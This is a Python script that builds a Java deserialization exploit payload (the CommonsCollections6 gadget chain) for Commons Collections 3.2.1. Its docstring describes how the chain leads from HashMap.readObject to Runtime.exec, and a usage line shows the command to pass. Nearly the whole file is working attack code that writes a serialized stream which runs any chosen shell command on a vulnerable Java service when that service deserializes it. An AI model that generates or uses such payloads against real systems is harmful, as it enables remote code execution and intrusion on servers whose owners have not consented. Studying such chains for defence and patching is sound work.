#!/usr/bin/env python3
"""
Pure-Python builder for a Java serialization gadget chain (CommonsCollections6)
targeting Commons Collections 3.2.1 on the target classpath. No Java toolchain
or ysoserial jar is required to build the payload.

Trigger (fires entirely inside ObjectInputStream.readObject, JDK17-safe):

  java.util.HashMap.readObject()
    -> hash(key) -> key.hashCode()         (key = TiedMapEntry)
    -> TiedMapEntry.hashCode() -> getValue()
    -> map.get(key)                        (map = LazyMap)
    -> LazyMap.get() -> factory.transform() (factory = ChainedTransformer)
       ConstantTransformer(Runtime.class)
       InvokerTransformer("getMethod",...) -> Runtime.getMethod("getRuntime")
       InvokerTransformer("invoke",...)    -> Runtime.getRuntime()
       InvokerTransformer("exec",...)      -> rt.exec(cmdArray)

serialVersionUIDs and field orders were read directly off Commons Collections
3.2.1 (ObjectStreamClass.lookup) and the JDK17 runtime classes.

Usage:
  python3 gadget.py sh -c 'touch /tmp/x'  > payload.bin
"""
import sys
import struct

# Java Object Serialization Stream Protocol constants; the values mirror
# java.io.ObjectStreamConstants.
STREAM_MAGIC = 0xACED  # first u2 of every stream
STREAM_VERSION = 5  # second u2 of every stream
TC_NULL = 0x70
TC_REFERENCE = 0x71  # followed by the 4-byte handle of an earlier object
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_CLASS = 0x76
TC_BLOCKDATA = 0x77  # followed by a 1-byte length, then that many raw bytes
TC_ENDBLOCKDATA = 0x78
baseWireHandle = 0x7E0000  # first handle number; Ser allocates upward from here

# classDescFlags bits
SC_WRITE_METHOD = 0x01  # class has a custom writeObject; its data ends with TC_ENDBLOCKDATA
SC_SERIALIZABLE = 0x02

# serialVersionUIDs (read off CC 3.2.1 / JDK17), keyed by the class name
# exactly as it is written into the class descriptor (binary names, with
# array classes in their "[L...;" form). class_desc looks names up here; the
# values should match the classes on the target's classpath.
UID = {
    "java.util.HashMap": 362498820763181265,
    "org.apache.commons.collections.keyvalue.TiedMapEntry": -8453869361373831205,
    "org.apache.commons.collections.map.LazyMap": 7990956402564206740,
    "org.apache.commons.collections.functors.ChainedTransformer": 3514945074733160196,
    "[Lorg.apache.commons.collections.Transformer;": -4803604734341277543,
    "org.apache.commons.collections.functors.ConstantTransformer": 6374440726369055124,
    "org.apache.commons.collections.functors.InvokerTransformer": -8653385846894047688,
    "[Ljava.lang.Object;": -8012369246846506644,
    "[Ljava.lang.String;": -5921575005990323385,
    "[Ljava.lang.Class;": -6118465897992725863,
}


class Ser:
    """Byte-level writer for the Java Object Serialization stream format.

    ``buf`` accumulates the stream, starting with the magic/version header.
    ``handles`` maps caller-chosen keys (e.g. ``("str", text)``) to the wire
    handle they were given, so repeated strings and class descriptors can be
    emitted as TC_REFERENCE back-references. Handles are numbered
    sequentially from ``baseWireHandle``.
    """

    # Tag for strings whose modified-UTF-8 form exceeds 0xFFFF bytes. Kept on
    # the class so this writer does not rely on a module-level constant.
    _TC_LONGSTRING = 0x7C
    # Largest byte length expressible by writeUTF's unsigned 16-bit prefix.
    _MAX_UTF_LEN = 0xFFFF

    def __init__(self):
        self.buf = bytearray()
        self.next_handle = baseWireHandle
        self.handles = {}
        self.buf += struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)

    def _assign(self, key=None):
        """Allocate the next wire handle, recording it under ``key`` if given."""
        h = self.next_handle
        self.next_handle += 1
        if key is not None:
            self.handles[key] = h
        return h

    def u1(self, v):
        """Append one byte; only the low 8 bits of ``v`` are kept."""
        self.buf.append(v & 0xFF)

    def u2(self, v):
        """Append a big-endian unsigned 16-bit integer."""
        self.buf += struct.pack(">H", v)

    def i4(self, v):
        """Append a big-endian signed 32-bit integer."""
        self.buf += struct.pack(">i", v)

    def i8(self, v):
        """Append a big-endian signed 64-bit integer."""
        self.buf += struct.pack(">q", v)

    @staticmethod
    def _encode_modified_utf8(s):
        """Encode ``s`` the way java.io.DataOutput.writeUTF does.

        Java's "modified UTF-8" differs from standard UTF-8 as follows:
        - U+0000 is written as the two bytes C0 80.
        - Characters outside the BMP are written as a UTF-16 surrogate pair,
          with each surrogate encoded as its own 3-byte sequence.
        Lone surrogates (e.g. from Python's surrogateescape argv decoding) are
        encoded the same way instead of raising UnicodeEncodeError.
        """
        units = s.encode("utf-16-be", "surrogatepass")
        out = bytearray()
        for hi, lo in zip(units[0::2], units[1::2]):
            c = (hi << 8) | lo
            if 0x0001 <= c <= 0x007F:
                out.append(c)
            elif c <= 0x07FF:  # also covers U+0000 -> C0 80
                out.append(0xC0 | (c >> 6))
                out.append(0x80 | (c & 0x3F))
            else:
                out.append(0xE0 | (c >> 12))
                out.append(0x80 | ((c >> 6) & 0x3F))
                out.append(0x80 | (c & 0x3F))
        return bytes(out)

    def utf(self, s):
        """Append ``s`` as writeUTF does: a u2 byte length, then modified UTF-8.

        Raises ValueError, without appending anything, if the encoded form is
        longer than 0xFFFF bytes. The u2 length prefix cannot express that;
        class and field names are written through this method.
        """
        b = self._encode_modified_utf8(s)
        if len(b) > self._MAX_UTF_LEN:
            raise ValueError("string too long for writeUTF: %d bytes" % len(b))
        self.u2(len(b))
        self.buf += b

    def string(self, s):
        """Write ``s`` as a Java String, or a back-reference if already written.

        Strings whose modified-UTF-8 form fits in 0xFFFF bytes use TC_STRING
        with a u2 length. Longer ones use TC_LONGSTRING with an 8-byte length.
        A fresh handle is recorded under ``("str", s)`` so later writes of
        the same text become TC_REFERENCE.
        """
        key = ("str", s)
        if key in self.handles:
            self.u1(TC_REFERENCE)
            self.i4(self.handles[key])
            return
        b = self._encode_modified_utf8(s)
        if len(b) <= self._MAX_UTF_LEN:
            self.u1(TC_STRING)
            self._assign(key)
            self.u2(len(b))
        else:
            self.u1(self._TC_LONGSTRING)
            self._assign(key)
            self.i8(len(b))
        self.buf += b


def class_desc(s, name, flags, fields):
    """Write a class descriptor for ``name``, or a back-reference to it.

    fields: list of (typechar, fieldname[, classname_string]). Object ("L")
    and array ("[") fields must carry the third element, their JVM type
    string. Fields are written in the order given.
    The superclass descriptor is always TC_NULL: the described class is
    treated as having no serializable superclass.

    Raises ValueError, before writing anything, in two cases:
    - ``flags`` marks the class serializable but UID has no entry for it
      (rather than silently writing 0).
    - An "L"/"[" field lacks its type string.
    """
    key = ("cd", name)
    if key in s.handles:
        s.u1(TC_REFERENCE)
        s.i4(s.handles[key])
        return
    if flags & SC_SERIALIZABLE and name not in UID:
        raise ValueError("no serialVersionUID recorded for " + name)
    for f in fields:
        if f[0] in ("L", "[") and len(f) < 3:
            raise ValueError("field %r of %s needs a type string" % (f[1], name))
    s.u1(TC_CLASSDESC)
    s.utf(name)
    # Descriptors written with flags 0 (e.g. java.lang.Runtime as a Class
    # constant) are not in UID and get 0 here.
    s.i8(UID.get(name, 0))
    s._assign(key)
    s.u1(flags)
    s.u2(len(fields))
    for f in fields:
        tc = f[0]
        s.u1(ord(tc))
        s.utf(f[1])
        if tc in ("L", "["):
            s.string(f[2])
    s.u1(TC_ENDBLOCKDATA)  # end of (empty) class annotation
    s.u1(TC_NULL)  # no superclass desc


def obj_handle(s):
    """Reserve the next wire handle for a newly written object, array or class.

    No lookup key is recorded, so this builder never back-references these
    handles. Reserving them keeps later handle numbers in step with the reader.
    """
    return s._assign(key=None)


# ----------------------------------------------------------------------------


def write_hashmap_with_key(s, key_writer):
    """Emit the outer java.util.HashMap holding exactly one entry.

    The entry's key is produced by ``key_writer(s)`` and its value is the
    string "v". HashMap.readObject reads defaultReadObject's fields
    (loadFactor, threshold), then a block with bucket count and size, then
    each key/value pair. It re-inserts every pair, so it calls hashCode()
    on the key while deserializing.
    """
    hashmap_fields = [("F", "loadFactor"), ("I", "threshold")]
    s.u1(TC_OBJECT)
    class_desc(s, "java.util.HashMap",
               SC_SERIALIZABLE | SC_WRITE_METHOD, hashmap_fields)
    obj_handle(s)
    # defaultWriteObject portion: loadFactor (float), threshold (int)
    s.buf += struct.pack(">fi", 0.75, 12)
    # custom writeObject data: one 8-byte block holding buckets and size
    s.buf += bytes((TC_BLOCKDATA, 8))
    s.buf += struct.pack(">ii", 16, 1)
    # The entry is part of the object annotation, so it precedes the end marker.
    key_writer(s)
    s.string("v")
    s.u1(TC_ENDBLOCKDATA)


def write_tied_map_entry(s, cmd_array):
    """Emit a TiedMapEntry whose key is the string "k" and whose map is a LazyMap."""
    tied_fields = [
        ("L", "key", "Ljava/lang/Object;"),
        ("L", "map", "Ljava/util/Map;"),
    ]
    s.u1(TC_OBJECT)
    class_desc(s, "org.apache.commons.collections.keyvalue.TiedMapEntry",
               SC_SERIALIZABLE, tied_fields)
    obj_handle(s)
    # Field values follow the descriptor order: key first, then map.
    s.string("k")
    write_lazy_map(s, cmd_array)


def write_lazy_map(s, cmd_array):
    """Emit a LazyMap with the transformer chain as its factory.

    LazyMap is flagged SC_WRITE_METHOD. After the ``factory`` field, the
    decorated (empty) HashMap is written as object annotation, closed by
    TC_ENDBLOCKDATA.
    """
    lazy_name = "org.apache.commons.collections.map.LazyMap"
    lazy_fields = [
        ("L", "factory", "Lorg/apache/commons/collections/Transformer;"),
    ]
    s.u1(TC_OBJECT)
    class_desc(s, lazy_name, SC_SERIALIZABLE | SC_WRITE_METHOD, lazy_fields)
    obj_handle(s)
    write_chained_transformer(s, cmd_array)
    write_empty_hashmap(s)
    s.u1(TC_ENDBLOCKDATA)


def write_empty_hashmap(s):
    """Emit a java.util.HashMap with zero entries (the map LazyMap decorates)."""
    load_factor, threshold, buckets, size = 0.75, 12, 16, 0
    s.u1(TC_OBJECT)
    class_desc(s, "java.util.HashMap", SC_WRITE_METHOD | SC_SERIALIZABLE,
               [("F", "loadFactor"), ("I", "threshold")])
    obj_handle(s)
    s.buf += struct.pack(">fi", load_factor, threshold)
    s.buf += bytes((TC_BLOCKDATA, 8))
    # size 0: the map stays empty, so containsKey(key) is false
    s.buf += struct.pack(">ii", buckets, size)
    s.u1(TC_ENDBLOCKDATA)


def write_chained_transformer(s, cmd_array):
    """Emit a ChainedTransformer whose single field is the Transformer[] chain."""
    desc_name = "org.apache.commons.collections.functors.ChainedTransformer"
    array_field = ("[", "iTransformers",
                   "[Lorg/apache/commons/collections/Transformer;")
    s.u1(TC_OBJECT)
    class_desc(s, desc_name, SC_SERIALIZABLE, [array_field])
    obj_handle(s)
    write_transformer_array(s, cmd_array)


def write_transformer_array(s, cmd_array):
    """Emit a Transformer[] whose elements come from build_transformers."""
    # build_transformers only creates writer closures; it writes nothing yet.
    element_writers = build_transformers(cmd_array)
    s.u1(TC_ARRAY)
    class_desc(s, "[Lorg.apache.commons.collections.Transformer;",
               SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(element_writers))
    for write_element in element_writers:
        write_element(s)


def build_transformers(cmd_array):
    """Return the ordered list of element writers for the transformer chain.

    Each callable takes the serializer and writes one transformer, in order:
    - ConstantTransformer(Runtime.class)
    - InvokerTransformer for getMethod("getRuntime")
    - InvokerTransformer for invoke(null)
    - InvokerTransformer for exec(cmd_array)
    """
    def write_constant(s):
        s.u1(TC_OBJECT)
        class_desc(
            s, "org.apache.commons.collections.functors.ConstantTransformer",
            SC_SERIALIZABLE, [("L", "iConstant", "Ljava/lang/Object;")],
        )
        obj_handle(s)
        write_class_object(s, "java.lang.Runtime")

    get_method = make_invoker(
        "getMethod",
        ["java.lang.String", "[Ljava.lang.Class;"],
        [("str", "getRuntime"), ("classarr", [])],
    )
    invoke = make_invoker(
        "invoke",
        ["java.lang.Object", "[Ljava.lang.Object;"],
        [("null", None), ("objarr", [])],
    )
    run_exec = make_invoker(
        "exec",
        ["[Ljava.lang.String;"],
        [("strarr", cmd_array)],
    )
    return [write_constant, get_method, invoke, run_exec]


def make_invoker(method_name, param_types, args):
    """Return a writer that emits an InvokerTransformer for ``method_name``.

    ``param_types`` are Java class names written as iParamTypes. ``args`` are
    (kind, value) pairs as accepted by write_object_array, written as iArgs.
    """
    invoker_fields = [
        ("L", "iArgs", "[Ljava/lang/Object;"),
        ("L", "iMethodName", "Ljava/lang/String;"),
        ("L", "iParamTypes", "[Ljava/lang/Class;"),
    ]

    def write_invoker(s):
        s.u1(TC_OBJECT)
        class_desc(s, "org.apache.commons.collections.functors.InvokerTransformer",
                   SC_SERIALIZABLE, invoker_fields)
        obj_handle(s)
        # Values in the same order as the descriptor's fields.
        write_object_array(s, args)
        s.string(method_name)
        write_class_array(s, param_types)

    return write_invoker


def write_object_array(s, args):
    """Emit an Object[] from a sequence of (kind, value) pairs.

    Supported kinds:
    - "str": a String
    - "null": TC_NULL; the value is ignored
    - "classarr": a Class[] of the named classes
    - "objarr": a nested Object[], written recursively
    - "strarr": a String[]
    Any other kind raises ValueError(kind) at the point it is reached.
    """
    handlers = (
        ("str", s.string),
        ("null", lambda _ignored: s.u1(TC_NULL)),
        ("classarr", lambda names: write_class_array(s, names)),
        ("objarr", lambda nested: write_object_array(s, nested)),
        ("strarr", lambda items: write_string_array(s, items)),
    )
    s.u1(TC_ARRAY)
    class_desc(s, "[Ljava.lang.Object;", SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(args))
    for kind, val in args:
        for tag, handler in handlers:
            if kind == tag:
                handler(val)
                break
        else:
            raise ValueError(kind)


def write_string_array(s, items):
    """Emit a String[] holding ``items``; repeated strings become back-references."""
    array_name = "[Ljava.lang.String;"
    s.u1(TC_ARRAY)
    class_desc(s, array_name, SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(items))
    for element in items:
        s.string(element)


def write_class_array(s, class_names):
    """Emit a Class[] whose elements are TC_CLASS entries for ``class_names``."""
    array_name = "[Ljava.lang.Class;"
    s.u1(TC_ARRAY)
    class_desc(s, array_name, SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(class_names))
    for java_name in class_names:
        write_class_object(s, java_name)


def write_class_object(s, class_name):
    """Emit a java.lang.Class value (TC_CLASS) naming ``class_name``.

    The descriptor is written with flags 0 and no fields.
    """
    s.u1(TC_CLASS)
    class_desc(s, class_name, flags=0, fields=[])
    obj_handle(s)


def build(cmd_array):
    """Return the complete serialized stream for ``cmd_array`` as bytes."""
    ser = Ser()

    def write_key(target):
        write_tied_map_entry(target, cmd_array)

    write_hashmap_with_key(ser, write_key)
    return bytes(ser.buf)


def main():
    """CLI entry point: write the stream built from sys.argv[1:] to stdout.

    Exits with status 2 and a usage line on stderr when no arguments are given.
    """
    cmd_array = sys.argv[1:]
    if not cmd_array:
        sys.stderr.write("usage: gadget.py <argv0> [argv1 ...]\n")
        sys.exit(2)
    payload = build(cmd_array)
    sys.stdout.buffer.write(payload)


if __name__ == "__main__":
    main()
